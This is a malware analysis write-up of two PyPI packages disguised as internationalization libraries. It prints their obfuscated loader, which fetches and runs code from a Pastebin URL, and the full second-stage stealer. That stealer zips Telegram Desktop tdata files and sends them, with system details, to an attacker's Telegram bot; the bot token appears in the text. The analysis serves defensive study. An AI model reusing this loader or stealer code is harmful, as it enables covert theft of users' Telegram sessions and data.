Obfuscated PyPI Packages Purporting to be i18n Libraries Actually Stealing Telegram Data
Phylum discovered two packages published to PyPI on October 28 that claim to be libraries for simplifying internationalization. The files were highly obfuscated and, upon further inspection, were found to contain malicious code designed to steal sensitive Telegram Desktop application data and system information and send it to an attacker-controlled Telegram channel.
Overview
The packages in question are called localization-utils and locute. The localization-utils package was published first and went through four iterations over ~30 minutes. A few hours later, the locute package was published and went through five iterations over ~90 minutes. The changes across version releases were minimal and seemed mostly to do with trying to get the MEMORY_OFFSET constant imported correctly (more on this later). In both packages, the obfuscated code ultimately pulls a non-obfuscated final payload from a remote Pastebin URL and executes it dynamically.
The Obfuscated Code
In both packages, the file that contains the obfuscated code is called inset.py. Here are its contents:
```python
from .utils_p.memory_normalizer import P1 as MEMORY_OFFSET

M = 0x18C
DEFAULT_LOCALE = "en"
globe = globals
_ = "".join
__ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [103, 101, 116, 97, 116, 116, 114]]))
___ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [95, 95, 105, 109, 112, 111, 114, 116, 95, 95]]))
____ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [99, 104, 114]]))


def __get_kernel_ato32_locale_driver():
    __api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))
    __addr = __(__api.request, _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0))]]))(_([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2)):]])).read()
    __(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 2) + (1 << 0))]]))(__addr)


def __exexute_offset_moving():
    __kernel_api = ___(_([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 2) + (1 << 0)):M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 3) + (1 << 2) + (1 << 1))]]))
    __excutor = __(__kernel_api, _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 3) + (1 << 2) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2))]]))
    __excutor(target=__get_kernel_ato32_locale_driver).start()


__exexute_offset_moving()
```
First, it’s interesting that the attacker goes to the effort of disguising this file as low-level memory or kernel interaction code, with names like MEMORY_OFFSET and __get_kernel_ato32_locale_driver. Second, there’s a variety of obfuscation techniques present here: a combination of character obfuscation, dynamic function calls, and bitwise operations.
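The character obfuscation is the easiest layer to undo. Each of the __, ___, and ____ assignments looks up a builtin by a name spelled out as ASCII codes. The sketch below copies those code lists verbatim from inset.py and decodes them with the same join-and-chr pattern. It only turns numbers back into text and never looks anything up or executes anything. The list names and the decode helper are hypothetical labels introduced for illustration.

```python
# Character-code lists copied verbatim from inset.py.
# The variable names here are illustrative labels, not names used by the malware.
BUILTINS_NAME = [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]
GETATTR_NAME = [103, 101, 116, 97, 116, 116, 114]
IMPORT_NAME = [95, 95, 105, 109, 112, 111, 114, 116, 95, 95]
CHR_NAME = [99, 104, 114]


def decode(codes):
    """Join ASCII codes into a string, equivalent to "".join([chr(c) for c in codes])."""
    return "".join(chr(c) for c in codes)


for codes in (BUILTINS_NAME, GETATTR_NAME, IMPORT_NAME, CHR_NAME):
    print(decode(codes))
```

Decoded, the three assignments are getattr(__builtins__, "getattr"), getattr(__builtins__, "__import__"), and getattr(__builtins__, "chr"), with __builtins__ reached through globe(), the alias for globals.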
Notice that the first line of this file imports what looks like a necessary memory offset constant from a “memory normalizer” utility (whatever that might be). If we pull this thread, however, we find a bit of attempted import misdirection. In memory_normalizer/__init__.py we find the following:
```python
from .headers import P1

__all__ = (
    "P1",
)
```
Looks innocuous enough, but let’s peek in memory_normalizer/headers.py. That file contains only a long list of integers:

```python
P1 = [117, 114, 108, 108, 105, 98, 46, 114, 101, 113, 117, 101, 115, 116, 117, 114, 108, 111, 112, 101, 110, 101, 120, 101, 99, 116, 104, 114, 101, 97, 100, 105, 110, 103, 84, 104, 114, 101, 97, 100, 104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 87, 78, 114, 97, 106, 97, 86, 75]
```
On its own, this could pass for an ordinary constants file in a well-organized package. Let’s go back to inset.py, now knowing that this long list of integers is what the code refers to as MEMORY_OFFSETS. The first reference to MEMORY_OFFSETS appears in the definition of the __api variable:

```python
__api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))
```
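Before unpicking the slicing, it helps to see the whole list decoded at once. The sketch below copies P1 verbatim from headers.py and applies the same chr-and-join step the malware uses. It only prints the resulting string.

```python
# P1 copied verbatim from memory_normalizer/headers.py.
P1 = [117, 114, 108, 108, 105, 98, 46, 114, 101, 113, 117, 101, 115, 116, 117, 114, 108, 111, 112, 101, 110, 101, 120, 101, 99, 116, 104, 114, 101, 97, 100, 105, 110, 103, 84, 104, 114, 101, 97, 100, 104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 87, 78, 114, 97, 106, 97, 86, 75]

# Same transformation as _([____(x) for x in MEMORY_OFFSETS]):
# each code becomes one character, and the characters are joined into one string.
decoded = "".join(chr(code) for code in P1)
print(decoded)
# urllib.requesturlopenexecthreadingThreadhttps://pastebin.com/raw/WNrajaVK
```

The string has no separators, so the module names, function names, and URL only come apart once the slice bounds are known.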
The attacker uses a combination of slicing, bitwise operations, and dynamic function invocation to obscure what’s really going on here. Recall the underscore variables defined earlier in the code:
- _ is set to "".join, a function to concatenate lists of strings.
- __ is an alias for getattr, a function to access an attribute of an object.
- ___ is an alias for __import__, a function to import modules at runtime.
- ____ is an alias for chr, a function to convert ASCII codes to characters.

With these aliases in mind, we can evaluate the code defining __api. It imports urllib.request, and because __import__ returns the top-level package, __api is really urllib. The next line defines __addr, which uses the urlopen function from __api.request (that is, urllib.request.urlopen) to fetch something from a remote URL and read the response. Let’s quickly work through the strings being dynamically generated here:
- MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]
  - This slice decodes to urllib.request.
  - The bitwise operation M ^ ((1 << 8) + (1 << 7) + (1 << 1)) calculates the end index of the slice. M is defined earlier as 0x18C, which is 396 in decimal, and (1 << 8) + (1 << 7) + (1 << 1) is 256 + 128 + 2 = 386. 396 XOR 386 is 14, so the slice is equivalent to MEMORY_OFFSETS[:14].
- MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0))]
  - This slice decodes to urlopen, a function in the urllib.request module for opening URLs.
  - Its bounds are computed with the same kind of bitwise operation and work out to MEMORY_OFFSETS[14:21].
- MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2)):]
  - This slice starts at index 40 (396 XOR 420) and runs to the end of the list. It decodes to the URL https://pastebin.com/raw/WNrajaVK, which is the target of the HTTP request.
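The same XOR trick sets every slice bound in inset.py, including the three slices the list above does not walk through. The sketch below evaluates each bound exactly as written in the obfuscated code and applies it to the decoded P1 string. That string is written out as a literal so the sketch is self-contained. Slicing the decoded string gives the same result as slicing MEMORY_OFFSETS and then decoding, because each code maps to exactly one character. The sketch imports urllib.request to confirm what __import__ returns, but it never fetches or executes anything.

```python
M = 0x18C  # 396, the constant defined at the top of inset.py

# Slice bounds copied from the obfuscated expressions in inset.py.
B1 = M ^ ((1 << 8) + (1 << 7) + (1 << 1))                                  # 396 ^ 386
B2 = M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0))            # 396 ^ 409
B3 = M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 2) + (1 << 0))            # 396 ^ 405
B4 = M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 3) + (1 << 2) + (1 << 1)) # 396 ^ 430
B5 = M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2))                       # 396 ^ 420

# Fully decoded P1 list, written as a literal to keep this sketch self-contained.
DECODED = "urllib.requesturlopenexecthreadingThreadhttps://pastebin.com/raw/WNrajaVK"

# Map each slice to the role it plays in inset.py.
pieces = {
    "module imported as __api": DECODED[:B1],
    "function fetched from __api.request": DECODED[B1:B2],
    "builtin applied to the download": DECODED[B2:B3],
    "module imported as __kernel_api": DECODED[B3:B4],
    "class fetched from __kernel_api": DECODED[B4:B5],
    "URL passed to urlopen": DECODED[B5:],
}

print(B1, B2, B3, B4, B5)  # 14 21 25 34 40
for role, text in pieces.items():
    print(f"{role}: {text}")

# __import__("urllib.request") returns the top-level package, which is why
# the malware reaches urlopen through __api.request.
top = __import__(DECODED[:B1])
print(top.__name__)  # urllib
```

Read together, the pieces spell out the whole loader. urllib.request.urlopen fetches the Pastebin URL, exec runs the response, and threading.Thread runs that downloader in the background.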
Let’s navigate to that Pastebin URL and figure out what gets pulled from it. Here’s the code found there:
```python
# https://pastebin.com/WNrajaVK
import json
import os
import platform
import socket
import subprocess
import time
import zipfile
from pathlib import Path

import requests

CHAT_ID = "-1002009496950"
TOKEN = "".join([chr(________________ ^ 257) for ________________ in [311, 312, 306, 308, 309, 305, 308, 311, 308, 305, 315, 320, 320, 324, 358, 330, 335, 376, 372, 343, 347, 375, 357, 373, 332, 344, 341, 352, 365, 366, 356, 305, 300, 331, 306, 379, 306, 365, 305, 360, 305, 361, 324, 375, 333, 324]])


def send_message(message_text):
    global TOKEN, CHAT_ID, requests
    base_url = f"https://api.telegram.org/bot{TOKEN}/sendMessage"
    requests.get(base_url, data={"text": message_text, "chat_id": CHAT_ID})


def send_file(file_path):
    global TOKEN, CHAT_ID, requests
    url = f"https://api.telegram.org/bot{TOKEN}/sendDocument"
    requests.post(
        url, data={"chat_id": CHAT_ID}, files={"document": open(file_path, "rb")}
    )


def get_system_report():
    global platform, socket, json, requests
    info = {}
    info["platform"] = platform.uname()
    info["platform-release"] = platform.release()
    info["platform-version"] = platform.version()
    info["architecture"] = platform.machine()
    info["hostname"] = socket.gethostname()
    info["ip-address"] = requests.get("http://api.ipify.org/").text
    info["processor"] = platform.processor()
    return json.dumps(info, indent=4)


system = platform.system()
if system == "Linux":
    tdata_dir = ".local/share/TelegramDesktop/tdata/"
else:
    tdata_dir = "AppData/Roaming/Telegram Desktop/tdata"
tdata_dir = Path.home() / Path(tdata_dir)

try:
    send_message(f"TARGET: '''{get_system_report()}'''")
    if tdata_dir.is_dir():
        subprocess.call(
            ["taskkill", "/f", "/im", "Telegram.exe"],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
        time.sleep(0.5)
        name = ""
        with open("debug.zip", "wb") as tmp:
            zf = zipfile.ZipFile(tmp, "w")
            for path in tdata_dir.rglob("*"):
                if path.is_file():
                    if os.stat(path).st_size < 10 * 1024:
                        zf.write(path.absolute(), path)
            zf.close()
            name = tmp.name
        send_message(f"TG FOUND!!\n{system}")
        send_file(name)
        os.remove(name)
    else:
        message_text = send_message(f"ERROR TG NOT FOUND!!\n{system} {tdata_dir}")
except Exception as e:
    pass
```
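Aside from the Telegram Bot Token, nothing in this file is obfuscated, so it’s fairly easy to see what’s going on here. The code is designed to:
- Collect system information such as platform, architecture, hostname, and public IP address (looked up via api.ipify.org).
- Look for the Telegram Desktop tdata directory, forcibly terminate any running Telegram.exe process with the Windows taskkill command, and compress every file under 10 KB from that directory into a zip archive named debug.zip. On a typical Linux system, taskkill does not exist. There the call raises an exception that the catch-all except block silently swallows, so only the system report is sent.
- Send the system information and the compressed Telegram Desktop data to an attacker-controlled Telegram channel via the Telegram Bot API, then delete the archive.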
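To make the path logic concrete, the sketch below re-implements only the payload’s directory-selection branch as a pure function. The function name targeted_tdata_dir is hypothetical. The values of platform.system() and Path.home() are passed in as arguments, so the sketch touches no real files and sends nothing.

```python
from pathlib import PurePosixPath, PureWindowsPath


def targeted_tdata_dir(system, home):
    """Return the tdata directory the payload would look for (hypothetical helper).

    `system` stands in for platform.system() and `home` for Path.home();
    only the path-selection branch of the payload is mirrored here.
    """
    if system == "Linux":
        relative = ".local/share/TelegramDesktop/tdata/"
    else:
        # Every non-Linux system, including macOS ("Darwin"), gets the Windows layout.
        relative = "AppData/Roaming/Telegram Desktop/tdata"
    return home / relative


print(targeted_tdata_dir("Windows", PureWindowsPath("C:/Users/alice")))
print(targeted_tdata_dir("Linux", PurePosixPath("/home/alice")))
print(targeted_tdata_dir("Darwin", PurePosixPath("/Users/alice")))
```

The last call shows a side effect of the if/else. On macOS, platform.system() returns "Darwin", so the payload looks for a Windows-style AppData path under the home directory. That path normally does not exist there, so the payload sends the "TG NOT FOUND" message instead of an archive.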
For reference, the Telegram Bot Token evaluates to: 6935405650:AAEgKNyuVZvdtMYTaloe0-J3z3l0i0hEvLE. It is obfuscated with a variant of the ASCII character technique seen in the local files: each code is XORed with 257 before being passed to chr.
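The XOR step is the only difference from the encoding used in the local files. The sketch below applies it to the first eleven codes of the TOKEN list, which decode to the bot ID and the colon separator. The remaining codes decode the same way. Every code in the list lies between 256 and 511, so XOR with 257 (binary 100000001) clears that 256 offset and flips the lowest bit. The helper name xor_decode is hypothetical.

```python
# First eleven codes of the TOKEN list from the Pastebin payload.
TOKEN_PREFIX_CODES = [311, 312, 306, 308, 309, 305, 308, 311, 308, 305, 315]


def xor_decode(codes, key=257):
    """XOR each code with `key`, then convert it to a character (hypothetical helper)."""
    return "".join(chr(code ^ key) for code in codes)


print(xor_decode(TOKEN_PREFIX_CODES))  # 6935405650:
```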
A Note About the MEMORY_OFFSET Import
As mentioned earlier, the first line of inset.py defines the import:

```python
from .utils_p.memory_normalizer import P1 as MEMORY_OFFSET
```
However, if you look closely, you’ll notice that the rest of the code refers to this variable with an “S” at the end. For example:

```python
__api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))
```
As also mentioned earlier, our diff analyzer indicates that the only differences between versions of localization-utils are around this import statement. Presumably, this was the attacker trying to figure out why the code wasn’t working during testing. With all the obfuscation and import misdirection, it appears they simply didn’t notice a typo. The code after the import references MEMORY_OFFSETS with an “S” on the end, while the import binds MEMORY_OFFSET without it. This would result in a NameError at runtime, and the diffs we’re seeing are most likely the attacker trying to debug it.
Conclusion
These packages show a dedicated and elaborate effort to evade detection via static analysis and visual inspection by employing a variety of obfuscation techniques. The code dynamically imports modules and functions, constructs a URL, fetches additional code, and executes it, with the end goal of stealing sensitive Telegram data. These packages serve as yet another stark reminder of the critical nature of dependency trust in our open source ecosystems. Given the extensive obfuscation and the deliberate attempts to mislead, there is a substantial risk that packages like these could slip past a cursory visual inspection.